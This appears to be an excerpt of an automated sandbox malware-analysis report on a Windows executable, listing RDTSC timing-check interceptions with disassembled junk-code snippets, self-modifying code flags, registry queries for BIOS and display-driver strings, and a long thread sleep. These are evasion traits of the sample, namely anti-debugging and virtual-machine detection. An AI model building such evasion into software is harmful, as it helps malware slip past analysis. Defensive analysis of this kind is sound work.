              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703A5 second address: 4D703D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE90543D6C2h 0x00000012 and eax, 724EC6A8h 0x00000018 jmp 00007FE90543D6BBh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703D7 second address: 4D703EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 30h 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, eax 0x00000013 mov bx, si 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703EE second address: 4D70450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov ah, 73h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE90543D6BFh 0x00000019 xor ecx, 1E7291FEh 0x0000001f jmp 00007FE90543D6C9h 0x00000024 popfd 0x00000025 call 00007FE90543D6C0h 0x0000002a pop ecx 0x0000002b popad 0x0000002c movsx edx, si 0x0000002f popad 0x00000030 mov dword ptr [ebp-18h], esp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov ecx, edi 0x00000038 popad 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70450 second address: 4D70456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70456 second address: 4D7045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7045A second address: 4D7047A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000018h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE9047A81D0h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7047A second address: 4D704FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE90543D6C1h 0x00000009 and si, 56F6h 0x0000000e jmp 00007FE90543D6C1h 0x00000013 popfd 0x00000014 mov ax, BFE7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, dword ptr [eax+00000FDCh] 0x00000021 pushad 0x00000022 pushad 0x00000023 mov edx, eax 0x00000025 popad 0x00000026 mov bx, BDC4h 0x0000002a popad 0x0000002b test ecx, ecx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FE90543D6C9h 0x00000034 xor cl, FFFFFFB6h 0x00000037 jmp 00007FE90543D6C1h 0x0000003c popfd 0x0000003d popad 0x0000003e jns 00007FE90543D6FCh 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D704FC second address: 4D70500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70500 second address: 4D70506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70506 second address: 4D7050C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7050C second address: 4D70576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d jmp 00007FE90543D6C0h 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE90543D6BEh 0x0000001c adc ax, 0198h 0x00000021 jmp 00007FE90543D6BBh 0x00000026 popfd 0x00000027 movzx esi, bx 0x0000002a popad 0x0000002b test ecx, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FE90543D6BEh 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D601C1 second address: 4D601C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D601C5 second address: 4D601CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D601CB second address: 4D60266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9047A81D8h 0x00000009 and esi, 6EAE5328h 0x0000000f jmp 00007FE9047A81CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FE9047A81D8h 0x0000001b sbb eax, 71B28588h 0x00000021 jmp 00007FE9047A81CBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push edi 0x00000030 pop eax 0x00000031 pushfd 0x00000032 jmp 00007FE9047A81D7h 0x00000037 or ax, 427Eh 0x0000003c jmp 00007FE9047A81D9h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60335 second address: 4D60339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60339 second address: 4D6033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6033F second address: 4D60354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60354 second address: 4D6035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 08FFh 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6035D second address: 4D60381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bl, cl 0x00000010 mov cx, di 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60381 second address: 4D60387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60387 second address: 4D6038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6038B second address: 4D6038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6038F second address: 4D603C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE90543D6C2h 0x00000010 jmp 00007FE90543D6C5h 0x00000015 popfd 0x00000016 push eax 0x00000017 push edx 0x00000018 mov si, 91FDh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D603C8 second address: 4D60423 instructions: 0x00000000 rdtsc 0x00000002 mov si, 50F9h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 test al, al 0x0000000b jmp 00007FE9047A81D4h 0x00000010 je 00007FE9047A8447h 0x00000016 pushad 0x00000017 mov edx, esi 0x00000019 popad 0x0000001a lea ecx, dword ptr [ebp-14h] 0x0000001d jmp 00007FE9047A81CFh 0x00000022 mov dword ptr [ebp-14h], edi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edx 0x00000029 pop esi 0x0000002a jmp 00007FE9047A81D7h 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6044C second address: 4D6047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov dl, C5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FE90543D6C1h 0x00000013 call 00007FE90543D6C0h 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6047D second address: 4D60483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6058C second address: 4D60663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE90543D6BFh 0x00000009 add esi, 33447D6Eh 0x0000000f jmp 00007FE90543D6C9h 0x00000014 popfd 0x00000015 mov ecx, 7078F6F7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d js 00007FE90543D757h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FE90543D6C8h 0x0000002a and eax, 59445418h 0x00000030 jmp 00007FE90543D6BBh 0x00000035 popfd 0x00000036 movzx eax, dx 0x00000039 popad 0x0000003a cmp dword ptr [ebp-14h], edi 0x0000003d jmp 00007FE90543D6BBh 0x00000042 jne 00007FE97613B546h 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007FE90543D6BBh 0x00000051 xor si, 758Eh 0x00000056 jmp 00007FE90543D6C9h 0x0000005b popfd 0x0000005c pushfd 0x0000005d jmp 00007FE90543D6C0h 0x00000062 or esi, 71FF2808h 0x00000068 jmp 00007FE90543D6BBh 0x0000006d popfd 0x0000006e popad 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60663 second address: 4D60675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60675 second address: 4D6067B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6067B second address: 4D6071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE9047A81D2h 0x0000000a popad 0x0000000b lea eax, dword ptr [ebp-2Ch] 0x0000000e pushad 0x0000000f push ecx 0x00000010 call 00007FE9047A81CDh 0x00000015 pop eax 0x00000016 pop ebx 0x00000017 movzx eax, bx 0x0000001a popad 0x0000001b push ebx 0x0000001c jmp 00007FE9047A81D6h 0x00000021 mov dword ptr [esp], esi 0x00000024 jmp 00007FE9047A81D0h 0x00000029 nop 0x0000002a pushad 0x0000002b mov dx, si 0x0000002e mov di, si 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 push edx 0x00000035 mov eax, 3B1F2D07h 0x0000003a pop esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushfd 0x0000003e jmp 00007FE9047A81D3h 0x00000043 or cx, 75CEh 0x00000048 jmp 00007FE9047A81D9h 0x0000004d popfd 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6071C second address: 4D6072A instructions: 0x00000000 rdtsc 0x00000002 mov ah, 2Bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6072A second address: 4D6072E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6072E second address: 4D60734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60734 second address: 4D6073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6073A second address: 4D6073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6073E second address: 4D60742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60CB8 second address: 4D60D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE90543D6BFh 0x00000008 jmp 00007FE90543D6C8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [75AB459Ch], 05h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE90543D6BDh 0x00000020 xor ax, 9396h 0x00000025 jmp 00007FE90543D6C1h 0x0000002a popfd 0x0000002b mov bx, cx 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60D18 second address: 4D60D3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE975495E9Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE9047A81CDh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60D3E second address: 4D60D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60D44 second address: 4D60D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60D48 second address: 4D60D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60D4C second address: 4D60D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60D5C second address: 4D60D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60DD8 second address: 4D60DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60DE7 second address: 4D60E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007FE90543D6BBh 0x0000000b jmp 00007FE90543D6C3h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE90543D6BFh 0x0000001c and esi, 3A1FD05Eh 0x00000022 jmp 00007FE90543D6C9h 0x00000027 popfd 0x00000028 mov bx, cx 0x0000002b popad 0x0000002c mov eax, dword ptr [esp+04h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov bl, ah 0x00000035 push edi 0x00000036 pop esi 0x00000037 popad 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60E51 second address: 4D60E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9047A81D3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60E68 second address: 4D60E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60E6C second address: 4D60EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FE9047A81D4h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx ecx, dx 0x00000019 pushfd 0x0000001a jmp 00007FE9047A81D9h 0x0000001f sbb esi, 63AC7C06h 0x00000025 jmp 00007FE9047A81D1h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60EC7 second address: 4D60EF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FE90543D6BEh 0x0000000f call 00007FE97613233Dh 0x00000014 push 75A52B70h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov eax, dword ptr [esp+10h] 0x00000024 mov dword ptr [esp+10h], ebp 0x00000028 lea ebp, dword ptr [esp+10h] 0x0000002c sub esp, eax 0x0000002e push ebx 0x0000002f push esi 0x00000030 push edi 0x00000031 mov eax, dword ptr [75AB4538h] 0x00000036 xor dword ptr [ebp-04h], eax 0x00000039 xor eax, ebp 0x0000003b push eax 0x0000003c mov dword ptr [ebp-18h], esp 0x0000003f push dword ptr [ebp-08h] 0x00000042 mov eax, dword ptr [ebp-04h] 0x00000045 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004c mov dword ptr [ebp-08h], eax 0x0000004f lea eax, dword ptr [ebp-10h] 0x00000052 mov dword ptr fs:[00000000h], eax 0x00000058 ret 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60EF6 second address: 4D60EFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60EFC second address: 4D60F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60F02 second address: 4D60F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60F06 second address: 4D60F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60F16 second address: 4D60F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60F1A second address: 4D60F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A08 second address: 4D70A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov eax, 404A192Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FE97549DC47h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A22 second address: 4D70A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A26 second address: 4D70A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A2A second address: 4D70A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A30 second address: 4D70A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7016EB3Bh 0x00000008 mov ecx, 03FF0017h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ax, di 0x00000017 push edx 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A4A second address: 4D70A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE90543D6C3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A61 second address: 4D70A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE9047A81CBh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A77 second address: 4D70AB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f call 00007FE90543D6C9h 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70AB5 second address: 4D70ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70B12 second address: 4D70B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE90543D6BCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70B22 second address: 4D70B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0DD68 second address: 5F0DD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6090B1F second address: 6090B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6090B23 second address: 6090B3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6090F5C second address: 6090F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609142F second address: 6091450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE90543D6C7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609427B second address: 609428D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jno 00007FE9047A81C6h 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609428D second address: 60942B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FE90543D6B6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 34314B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 355AE9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3CFDF2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F0DDEC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F0DCF0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 60C1D61 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7560Thread sleep time: -36018s >= -30000sJump to behavior
